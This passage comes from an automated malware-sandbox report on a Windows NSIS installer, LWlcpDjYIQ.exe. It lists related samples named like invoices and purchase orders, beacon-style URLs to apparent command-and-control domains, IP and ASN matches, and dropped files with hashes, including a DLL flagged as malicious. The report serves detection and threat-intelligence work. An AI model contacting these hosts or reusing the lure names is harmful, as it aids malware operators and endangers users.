                                                                        • www.tollisenschool.com/g7b/?8p=chLXzryXh&tL30J=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBtE+arhNut
                                                                        swift_76567643.exeGet hashmaliciousBrowse
                                                                        • www.hicapitolize.com/m8es/?CVJ=sG6ecfng0YvqxX6BTfb7C0qDagoY2GDrv6xqwretuMrKP6q0Q4gvq6Z0725wPxuv0KtT&oX9=Txo8ntB0WBsp
                                                                        Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                        • www.tollisenschool.com/g7b/?RzulnV=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBHbOqrlPmt&QL3=tTypTNm0gPD0F
                                                                        2021-04-01.exeGet hashmaliciousBrowse
                                                                        • www.tollisenschool.com/g7b/?o2=iL30VlAxs&8pntMJ6P=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqlghXUv6T7qPq
                                                                        onbgX3WswF.exeGet hashmaliciousBrowse
                                                                        • www.sgdivergence.com/c22b/?w6=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&1b=W6O4DXSP5
                                                                        ARBmDNJS7m.exeGet hashmaliciousBrowse
                                                                        • www.bootstrapexpress.com/aqu2/?rPj0Qr6=nYriP3GcRBwukkcsj3Cw6qOI4UbADI9fnlgfdFCApi4mXX+dpAaC8djN6XYIns7fxRpg&tXrx=gdkpfvSpm
                                                                        Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                        • www.simplyhealrhcareplans.com/sqra/?EBZ=ZTIti4FxbnDxH&YVMp8pfx=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK
                                                                        PO.1183.exeGet hashmaliciousBrowse
                                                                        • www.dentalenhancments.com/god/?XDKPxrlh=EnxYEfX2deexTb058Y7c97BLkeqRbsEiixp341UOoiLWyojMB+48BbQ1WdyM7J0osU9+&anM=LjfLu4hPXh18f
                                                                        Scan-45679.exeGet hashmaliciousBrowse
                                                                        • www.wwwrigalinks.com/gwam/?Bjq=CXJcwEGd359wd7S74zzuJNqJGNLbtnXn+r8vDW7RCwie8OTRcmbQ6IgfXutP9/RkpDpW&Efzxz2=2dut_L3xNbOxThN
                                                                        TT Remittance Copy.PDF.exeGet hashmaliciousBrowse
                                                                        • www.creditcorecard.com/ihmh/?wP9=1bJfls8sWvOO1f7Vh8wqJhCF9whiFTpEYoud4iYCKocbr8IRO//r9FkTIR4//YxGu1lm&lZQ=7nbLunBhP
                                                                        DK Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                                        • www.atualizacao.net/vsk9/?GFQH8=DklfZSbfSG8rWu2eKGFDH5WZs9/qq3j2XcYy6rNlSIz25CVNqPMMuncxEVlgc+oIXeWq&llsp=gTULpTwpERQd0J
                                                                        198.185.159.144RCS76393.exeGet hashmaliciousBrowse
                                                                        • www.pimpmyrecipe.com/goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz
                                                                        PO4308.exeGet hashmaliciousBrowse
                                                                        • www.alchemistslibrary.com/pnqr/?X2JtjTX8=z9nKZcvAPWzUQhY9y3T5XVIzOkQhxhUtd7CKHZyMoghVgOSKx+Fjs7sJEQh08Ts7gk8yJD62ag==&bl=TVItEdNXpFHh
                                                                        TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                        • www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu
                                                                        Order Inquiry.exeGet hashmaliciousBrowse
                                                                        • www.getgenevieved.com/r4ei/?9rQl2=wFNtQXbP&t6Ad=lOfuxtPF4il1Jf5EERhirk3Wdt+b9SUzBWaFyElm1rRKZL2x7wuCbVuufCM8qdhuJ86n
                                                                        TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                                        • www.cindybelardo.com/qqeq/?oX=dLvWoyYzKTWvJDoMFkksqqSDwqODaAlE6DnRYqazt3fnGgf3WgjjWBSyr976CPGLkKL8&sBZ8qr=Fxl8FxGPjJo8-
                                                                        New Order.exeGet hashmaliciousBrowse
                                                                        • www.radiorejekts.com/gwam/?Iry=ONtj9W7nV9ZGpEHVJNfDlWrNbkpYgiFClGnoUoEoQiKZyCXOLwMg6K6LKjWWFncBTlNA&ob30vr=S0Glx8
                                                                        SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                                        • www.cindybelardo.com/qqeq/?UR-TRLn=dLvWoyYzKTWvJDoMFkksqqSDwqODaAlE6DnRYqazt3fnGgf3WgjjWBSyr+bASemz+tq7&P6u=Hb9l0TTXQ4NLhX
                                                                        New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
                                                                        • www.xomonroe.com/evh4/?vR-lx=mUKuFt7Jt/u71c4PSt38ziCZS3BUg2e8LD2S6eZiZC4IumnTujc05pOAm4tUdXdaGNCmokkeSA==&E8LHll=jfIX5LDxkxdhJTgP
                                                                        New Month.exeGet hashmaliciousBrowse
                                                                        • www.ussouthernhome.com/nppk/?kfIXa4=PcNj3q/CMcdvPYJC9A1ueSg5wRTqWaK9K+KWTMGfE5xIowphBNT+eHYPWkjoOWig7+Qi&XP0=ybFLQT2H0FsXBx
                                                                        QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                                        • www.markrobersticker.com/aun3/?YrIHdvPX=r/YBW9ssF3S+2poRG61gcf3j1YCgKIjwgQz6XW4ODbs5DL3PWKC9kUAY5ABsTG3sD74i&Dzut_N=3fm0
                                                                        new built.exeGet hashmaliciousBrowse
                                                                        • www.amymako.com/klf/?TlX=YvLT&t8o=YIBPr2PP4TUydPzAxpqYzoT8Fd3d4uq1lz450j/EP32B3j2OHU2eBgUME3q0XrkiC9k9
                                                                        Invoice.xlsxGet hashmaliciousBrowse
                                                                        • www.aratssycosmetics.com/iu4d/?L2JH=uKRUrjhLA6aGoerdjROgrXpkE9A34BbuVfDDyYeArPtVUwLJNjfP2xipo2Au/YQGKskRiw==&0n=fxlp
                                                                        MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                        • www.egofickle.com/rrrq/?0R-LTpD=fIBAwtBUc2AtuFdzEcCTdBR4iqwx1dALhor1r45uJJNE7oTAKP6XpVhMc7NBwxyLLq7z&uDKlwt=XPiPwvlxrzD
                                                                        Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                        • www.anadelalastra.art/sqra/?EBZ=ZTIti4FxbnDxH&YVMp8pfx=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ
                                                                        SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                                        • www.238olive.com/klf/?2d8=rhE1aKYrK3koE+pmz9VaVxftp+vdw8+avUxfPqYILSGoF3JOgjBtvswgsokuHBHrC7nI&Lxl=BRg8bD
                                                                        invoice bank.xlsxGet hashmaliciousBrowse
                                                                        • www.susanlevinedesign.com/aqu2/?_nO8YBS=OFrxr2AG5sLOiC43MRnhB8o53CAdFk4SvtI8ZSN28mbVlFBwADBBAWKkltJEya8/hH0wnw==&bxop=FZm0mNKHSv9Pklc
                                                                        Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                                        • www.anewdistraction.com/p2io/?n8Ehjz3=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwAHOv6iOkY&JtxH=XPs0s4JPf
                                                                        Y79FTQtEqG.exeGet hashmaliciousBrowse
                                                                        • www.susanlevinedesign.com/aqu2/?8pdLW0th=OFrxr2AD5rLKiS07ORnhB8o53CAdFk4SvtQsFRR34GbUl0t2HTQNWSymmIl4p6IMuGhA&axo=tVBlCVNXaRgL
                                                                        Copia de Pago.exeGet hashmaliciousBrowse
                                                                        • www.seven-sky-design.com/8zdn/?Tr=UA0JRRNNGgyCrLEeFSYc4fkbt600OjnT6M+PknAARvSCalKfl3PdvOrZ8sJOOFcGNxy42YqhWw==&SX=dnTDePe8Qj3d6d-
                                                                        Scan copy 24032021_jpeg.exeGet hashmaliciousBrowse
                                                                        • www.ladybirdatl.com/mdi/?DvU40z=gbTtoHWH1f&ArR=5cMaopyOujvaeqV9h79kD2ccJVSTeajotkRPxuWGSEYGhWshDn/S1XozbhbkImNZiAOP

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comPaymentAdvice.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        BL01345678053567.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        New Order.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        BL84995005038483.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        SB210330034.pdf.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        YMvYmQQyCz4gkqA.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        executable.2772.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        onbgX3WswF.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        Swift001_jpg.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        Scan-45679.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        TT Remittance Copy.PDF.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        PO-108561.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        SWIFT COPY_pdf.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        emergency.vbsGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        yx8DBT3r5r.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        Po # 6-10331.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        4849708PO # RMS0001.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        order samples 056-062 _pdf.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        NRfnt8tK24.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        www.simplyhealrhcareplans.comALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        www.huongdandidong.comALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                        • 108.186.210.142
                                                                        www.kaashir.comBista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                        • 208.91.197.27
                                                                        ext-sq.squarespace.comTazxfJHRhq.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        Order Inquiry.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        New Order.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.144
                                                                        New Order.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        DHL Shipping Documents.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.145
                                                                        New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        New Month.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        new built.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        Invoice.xlsxGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        Scan-45679.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.145
                                                                        products order pdf.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.144
                                                                        Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        1LHKlbcoW3.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.145
                                                                        fNiff08dxi.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        Bs04AQyK2o.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.145

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        BODIS-NJUSRCS76393.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        PaymentAdvice.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        RFQ_ V-21-Kiel-050-D02.xlsxGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        New Order.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        payment.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        Order.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        PaymentInvoice.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        SB210330034.pdf.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        swift_76567643.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        2021-04-01.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        onbgX3WswF.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        ARBmDNJS7m.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        PO.1183.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        Scan-45679.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        TT Remittance Copy.PDF.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        DK Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                                        • 199.59.242.153
                                                                        SQUARESPACEUSRCS76393.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        PO4308.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        Order Inquiry.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        PO#41000055885.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.144
                                                                        TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        New Order.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.144
                                                                        New Order.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        DHL Shipping Documents.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.145
                                                                        New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        New Month.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        new built.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        Invoice.xlsxGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        invoice bank.xlsxGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        Scan-45679.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.145
                                                                        HETZNER-ASDE1wOdXavtlE.exeGet hashmaliciousBrowse
                                                                        • 88.99.66.31
                                                                        eQLPRPErea.exeGet hashmaliciousBrowse
                                                                        • 135.181.58.27
                                                                        vbc.exeGet hashmaliciousBrowse
                                                                        • 195.201.179.80
                                                                        vgUgvbLjyI.exeGet hashmaliciousBrowse
                                                                        • 195.201.225.248
                                                                        Rechnung.docGet hashmaliciousBrowse
                                                                        • 46.4.51.158
                                                                        6IGbftBsBg.exeGet hashmaliciousBrowse
                                                                        • 88.99.66.31
                                                                        SecuriteInfo.com.W32.AIDetect.malware2.22480.exeGet hashmaliciousBrowse
                                                                        • 195.201.225.248
                                                                        Revised Invoice No CU 7035.exeGet hashmaliciousBrowse
                                                                        • 78.46.133.81
                                                                        ikoAImKWvI.exeGet hashmaliciousBrowse
                                                                        • 88.99.66.31
                                                                        V7UnYc7CCN.exeGet hashmaliciousBrowse
                                                                        • 88.99.66.31
                                                                        uTQdPoKj0h.exeGet hashmaliciousBrowse
                                                                        • 95.217.123.103
                                                                        uTQdPoKj0h.exeGet hashmaliciousBrowse
                                                                        • 95.217.123.103
                                                                        Updated SOA.xlsxGet hashmaliciousBrowse
                                                                        • 136.243.92.92
                                                                        SecuriteInfo.com.W32.AIDetect.malware1.16239.exeGet hashmaliciousBrowse
                                                                        • 195.201.225.248
                                                                        SecuriteInfo.com.W32.AIDetect.malware1.23167.exeGet hashmaliciousBrowse
                                                                        • 195.201.225.248
                                                                        receipt-xxxx.htmGet hashmaliciousBrowse
                                                                        • 88.99.136.47
                                                                        comprobante de pago bancario.exeGet hashmaliciousBrowse
                                                                        • 168.119.91.111
                                                                        April_2021_Purchase_Order_000000000000000000000000.pdf.exeGet hashmaliciousBrowse
                                                                        • 95.217.195.80
                                                                        PAY-INV-1007.exeGet hashmaliciousBrowse
                                                                        • 95.217.195.80
                                                                        40JHtWiswn.exeGet hashmaliciousBrowse
                                                                        • 195.201.225.248

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Temp\e68h9be2heenoc
                                                                        Process:C:\Users\user\Desktop\LWlcpDjYIQ.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6661
                                                                        Entropy (8bit):7.9587705785959235
                                                                        Encrypted:false
                                                                        SSDEEP:192:zBZehDwnmMs0HO/tFfb1WE8w0OwBTV+XPm8s:fNnfuFl/p0OwBTVom8s
                                                                        MD5:2D216B1AFB13BF6A41DAB8212338927E
                                                                        SHA1:FBA979DAD34C5EDB59FF776EFBFD0A274D1CEB53
                                                                        SHA-256:377FA98648C4DFA9B8251520812F0B1BDB59EB5E3F8FD36C72E53582E64758AE
                                                                        SHA-512:6D9A3B28D85EDCF7A85544B4269CC06A39F38A40C00749181A7F08B15BC5C8F60AEB9E869280E578723D18E554CD7761962E74334DD8AE0976B4BFCE50200646
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: .z.RC....\.Z7*....UC`.....Kg..Z8....qnz.O0i.<....hM....E..%M...F...i.+..h|I..W^.....7.......!i<....8..{Sf ..e.a....=>7..O...O...m.R...Ri|..D.u...Iv.>&..#$.N....DfyzO.i.w+jX...ru.%q0.....05ot...|bbvc......X.y....2.....NGP.O....T|}.'w<.+D..@U*B..F.Q..1..]..'z....N`.......".......j.q.f...e"..N&.N.$~.V.En.*.vboR...G..L.m|.....B...r.`.z...X....@..7.......m...1iRS..+...o.......~w.6%@..$ 89........B.....7!.Y....k......W.....lf=/...{S=....S`of....L('>.D....i....2.ajk..]....K..;...t..Xo6.X@.~.Iz...../(]......."..Z-.D..1.R_,V_..._`6.....0%&O[..:x.&.....P..o.....|O.....!Lsr.,....G.|.. _.?H.*.i...3.s5.....L=>..G.}.*%..Q...g..kx..?...'iC.v..-...#$....&.B.,z&^....vu.o.............305.t.....>%,tO.k..>m.ix.<M.R..D..?..!..>|..}(....+..P}.I=.U-.D.P.0p.....,Xe.4.L.-...8...Etsb.pc.<O0P.;U..0I.....P.-nc.V.8.-&q.-.Zv.O.....A.....%J.......B .R.ls~=[.E..eK.!..{.=>z(v......[.q..u....A|c.^/(5N......0.e7$.2.!Y..F.\.R:..l..?.X......#.h.J".of};.V......t.......<G...../e...
                                                                        C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll
                                                                        Process:C:\Users\user\Desktop\LWlcpDjYIQ.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):5120
                                                                        Entropy (8bit):4.135806506364649
                                                                        Encrypted:false
                                                                        SSDEEP:48:StF53c72xDiPqABPvhCWv+POuD2xSOGa4zzBvoAXAdUMQ9BgKRuqS:epuoOrZGXHBgVueqx
                                                                        MD5:E5A5E61AD269D94AA1F74F929F76ADDC
                                                                        SHA1:41A4642319054581903776CD0FE5AC282EC6FC8A
                                                                        SHA-256:3E39C71277FD492F9E995A5913176BEBD8F78B9CFF306A9CE6E5C8DBA7600015
                                                                        SHA-512:81F2245B1C4C465ACFC6BA70A81BA840A04B65D87F7C88AC44CBE816E8BE546FD7B4A56D5A162DA5F4BC991436D95A0D0AB289856F1F3D2472C690EBDDA07FA9
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                                        Reputation:low
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L...$im`...........!......................... ...............................`............@......................... !..L...X".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..(.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\o5ph6yxu2bx7
                                                                        Process:C:\Users\user\Desktop\LWlcpDjYIQ.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):164864
                                                                        Entropy (8bit):7.999102061329467
                                                                        Encrypted:true
                                                                        SSDEEP:3072:gbpNGMsacBTLPQ6XNxuq/L8It9Uv3oc78YYWiqf9N8OrOUGuVJLMizNupDn90u:gbjB8BXo6XN9QipQY2zu14iprz
                                                                        MD5:1561C77B8880F2D836E670BD0BBE4747
                                                                        SHA1:4F608974B29A20293AFDF48EFA952BC2A75BBCE6
                                                                        SHA-256:636ECB0968871D043AC47B9D27235810DFD4BE00A4FF3CDAED88E4C7EE93B77E
                                                                        SHA-512:80A28FBEE55D66FE74782F44A8224135FAD85C50383D7513C7752FEE9749E5F4FA2422A31D4CE40E7D60C8D53717B9FC4E4819250E53D29F2594734E6D02F78A
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: 7..4.e.2..<....4V...{.pm._v&.;hlW.m..(...l..:<.`..+..+....!....~.=L|..q...j....Y[n.^..K..O..i._^.y...g..}...xR..O..m..=^.EN.ly..XYtK.4.A.4_..&:..y.*.'*e.\3JD-.oU.......w.....r'.....X.}..Z.k..V?...?...../Bn.....U.VH..< ...&..a..Pt...Pk$.00.N.V{.....)...HRK..hI..Y.mC......b.1....R..q3.B.'./..F1.#..|..B.H.eQ... ..J......Y..-.Ev...B...+H0qN...X.._...C.Z..*.|...Q..>[R.....>`=M.....'.o. T0.. .@..Pj.....V.PD...Lj.(g"..\bnt!...w......P..Y:{ ..\...WUY.....$..8.9A...0.nT.A0.z.....q).3nMvT..B.......D...6.....4...P.r...j@jU.a.".......rD...'.4...K.<L..Zd..a..t.....\...C.....&..H.K.l@.C. ..C_;o.=.>(...$.2C|..U.HN.B..H....8.d.....+W.|KQD^.. .[..F..CRx;.](.{~..l_..e1jx.>X.Ku.w.....^.y.........`.[..We3...{u.z4.b...p.K...;.7[..p...?./U......}s..A .].5......j.m.....`y-i.....'..a...z<..Xk....y..m.....?5...E[.8s.";...BO....!...S}..6^.<.47.......(..s.n].l.S2.Afr........_E.2&=P.9J.cw.=.._.8!..y..D.;.+....U..../B.-($..w Hi.o\.An...@.wY....d9. .........u.....|.x.

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit):7.915095365643499
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:LWlcpDjYIQ.exe
                                                                        File size:206058
                                                                        MD5:91523f8d438585534d9466432cc4665d
                                                                        SHA1:e34b69f0ded056eca7dd43b8f5be2edf7198c211
                                                                        SHA256:b5e3426a888ddb5751f9802093f1bd10ec696b2994bee03b99b7ba2b4f21a57d
                                                                        SHA512:e8035c994acd9e46738b87eae25248df1548f8782d7475b4e9d362b68362ce62962780e46be0e054b9645d1be4e1eea8c93096f8e90bcb179040b5014eeec77b
                                                                        SSDEEP:3072:NeYBCwqDxkJ0APVbpNGMsacBTLPQ6XNxuq/L8It9Uv3oc78YYWiqf9N8OrOUGuVf:NDIqbjB8BXo6XN9QipQY2zu14iprCP
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lJ...$...$...$./.{...$...%.9.$.".y...$.......$.f."...$.Rich..$.........................PE..L.....8E.................\.........

                                                                        File Icon

                                                                        Icon Hash:00828e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x403166
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x4538CD1D [Fri Oct 20 13:20:29 2006 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        sub esp, 0000017Ch
                                                                        push ebx
                                                                        push ebp
                                                                        push esi
                                                                        xor esi, esi
                                                                        push edi
                                                                        mov dword ptr [esp+18h], esi
                                                                        mov ebp, 00409240h
                                                                        mov byte ptr [esp+10h], 00000020h
                                                                        call dword ptr [00407030h]
                                                                        push esi
                                                                        call dword ptr [00407270h]
                                                                        mov dword ptr [0042F4D0h], eax
                                                                        push esi
                                                                        lea eax, dword ptr [esp+30h]
                                                                        push 00000160h
                                                                        push eax
                                                                        push esi
                                                                        push 00429860h
                                                                        call dword ptr [00407158h]
                                                                        push 00409230h
                                                                        push 0042EC20h
                                                                        call 00007F3D4CBC89D8h
                                                                        mov ebx, 00436400h
                                                                        push ebx
                                                                        push 00000400h
                                                                        call dword ptr [004070B4h]
                                                                        call 00007F3D4CBC6119h
                                                                        test eax, eax
                                                                        jne 00007F3D4CBC61D6h
                                                                        push 000003FBh
                                                                        push ebx
                                                                        call dword ptr [004070B0h]
                                                                        push 00409228h
                                                                        push ebx
                                                                        call 00007F3D4CBC89C3h
                                                                        call 00007F3D4CBC60F9h
                                                                        test eax, eax
                                                                        je 00007F3D4CBC62F2h
                                                                        mov edi, 00435000h
                                                                        push edi
                                                                        call dword ptr [00407140h]
                                                                        call dword ptr [004070ACh]
                                                                        push eax
                                                                        push edi
                                                                        call 00007F3D4CBC8981h
                                                                        push 00000000h
                                                                        call dword ptr [00407108h]
                                                                        cmp byte ptr [00435000h], 00000022h
                                                                        mov dword ptr [0042F420h], eax
                                                                        mov eax, edi
                                                                        jne 00007F3D4CBC61BCh
                                                                        mov byte ptr [esp+10h], 00000022h
                                                                        mov eax, 00000001h

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74500xb4.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x567.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
